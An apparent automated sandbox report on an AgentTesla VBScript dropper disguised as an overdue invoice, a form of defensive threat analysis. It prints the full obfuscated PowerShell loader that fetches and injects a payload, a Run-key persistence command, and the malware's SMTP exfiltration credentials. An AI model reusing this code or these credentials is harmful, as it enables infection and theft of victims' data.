Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
03-06-2024 09:18
Static task
static1
Behavioral task
behavioral1
Sample
overdue_invoice.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
overdue_invoice.vbs
Resource
win10v2004-20240426-en
General
-
Target
overdue_invoice.vbs
-
Size
15KB
-
MD5
7078829e255df55f25a8bcaa9bdaffb4
-
SHA1
1bcacd12305661a2dedecb4eb6f8ad57ae5d672e
-
SHA256
d16ea5d6d40c9020b99032eaefab9b62f3c63bae12d24103a6b10ac5a2dcd34c
-
SHA512
4d56cc648febb1c0dceb44e41415cb30a9e975997f5d3fa67b97e2a039d6068f383e285daeb39b50eb0b18bd1a1c5c102544f2670e54e3109cff74d6268e1495
-
SSDEEP
192:ulJUFFdUTxfDs+rHw7FEFggnliEWHxg40HG5Q6MkouP0L3gwJSi3qMFP6WPS6vMy:ulCHkxNrHwhEjiIvkJ8LJRY4Er8saQa
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.defenber.com - Port:
587 - Username:
[email protected] - Password:
X8hhdzc})RSz - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 15 4456 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tonsillectomic = "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\\Codebtors\\').Typeregningens;%Rundsavsbladene% ($sartor)" reg.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 36 api.ipify.org 37 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 5016 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 4980 powershell.exe 5016 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4980 set thread context of 5016 4980 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 4456 powershell.exe 4456 powershell.exe 4980 powershell.exe 4980 powershell.exe 4980 powershell.exe 5016 wab.exe 5016 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 4980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 4456 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeDebugPrivilege 5016 wab.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
wab.exepid process 5016 wab.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
WScript.exepowershell.exepowershell.exewab.execmd.exedescription pid process target process PID 4168 wrote to memory of 4456 4168 WScript.exe powershell.exe PID 4168 wrote to memory of 4456 4168 WScript.exe powershell.exe PID 4456 wrote to memory of 2628 4456 powershell.exe cmd.exe PID 4456 wrote to memory of 2628 4456 powershell.exe cmd.exe PID 4456 wrote to memory of 4980 4456 powershell.exe powershell.exe PID 4456 wrote to memory of 4980 4456 powershell.exe powershell.exe PID 4456 wrote to memory of 4980 4456 powershell.exe powershell.exe PID 4980 wrote to memory of 2068 4980 powershell.exe cmd.exe PID 4980 wrote to memory of 2068 4980 powershell.exe cmd.exe PID 4980 wrote to memory of 2068 4980 powershell.exe cmd.exe PID 4980 wrote to memory of 5016 4980 powershell.exe wab.exe PID 4980 wrote to memory of 5016 4980 powershell.exe wab.exe PID 4980 wrote to memory of 5016 4980 powershell.exe wab.exe PID 4980 wrote to memory of 5016 4980 powershell.exe wab.exe PID 4980 wrote to memory of 5016 4980 powershell.exe wab.exe PID 5016 wrote to memory of 764 5016 wab.exe cmd.exe PID 5016 wrote to memory of 764 5016 wab.exe cmd.exe PID 5016 wrote to memory of 764 5016 wab.exe cmd.exe PID 764 wrote to memory of 1804 764 cmd.exe reg.exe PID 764 wrote to memory of 1804 764 cmd.exe reg.exe PID 764 wrote to memory of 1804 764 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"3⤵PID:2628
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"4⤵PID:2068
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"5⤵
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"6⤵
- Adds Run key to start application
- Modifies registry key
PID:1804
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
480KB
MD59916e5a5f7afe8c1f861f93999a875f3
SHA18d1f119fcb5942cd8e71f3bb1fc527c2a74549cc
SHA25697cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df
SHA51230b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc